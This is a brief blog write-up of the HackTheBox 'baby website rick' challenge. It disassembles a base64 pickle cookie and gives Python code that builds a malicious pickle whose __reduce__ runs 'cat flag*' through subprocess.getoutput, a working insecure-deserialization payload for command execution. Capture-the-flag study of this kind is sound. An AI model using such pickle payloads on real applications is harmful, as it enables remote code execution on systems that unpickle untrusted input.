HackTheBox baby website rick write-up
2021. 4. 15. 22:04
>>> pickletools.dis(b64decode(code))
0: ( MARK
1: d DICT (MARK at 0)
2: p PUT 0
5: S STRING 'serum'
14: p PUT 1
17: c GLOBAL 'copy_reg _reconstructor'
42: p PUT 2
45: ( MARK
46: c GLOBAL '__main__ anti_pickle_serum'
74: p PUT 3
77: c GLOBAL '__builtin__ object'
97: p PUT 4
100: N NONE
101: t TUPLE (MARK at 45)
102: p PUT 5
105: R REDUCE
106: p PUT 6
109: s SETITEM
110: . STOP
highest protocol among opcodes = 0
from base64 import b64decode, b64encode
import pickletools
import subprocess
import pickle
import os
class anti_pickle_serum:
pass
code = b'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'
serum = pickle.loads(b64decode(code))
pickletools.dis(b64decode(code))
print('[ DEBUG ] serum :', serum)
class anti_pickle_serum(object):
def __reduce__(self):
return subprocess.getoutput, ("cat flag*", )
serum = {'serum': anti_pickle_serum()}
code = pickle.dumps(serum, protocol=0)
pickletools.dis(code)
print(b64encode(code))
굳
'write-ups' 카테고리의 다른 글
| HackTheBox Heist write-up (0) | 2021.05.10 |
|---|---|
| HackTheBox LoveTok write-up (0) | 2021.04.19 |
| HackTheBox baby breaking grad write-up (0) | 2021.04.15 |
| HackTheBox baby todo or not todo write-up (0) | 2021.04.14 |
| HackTheBox baby WAFfles order write-up (0) | 2021.04.14 |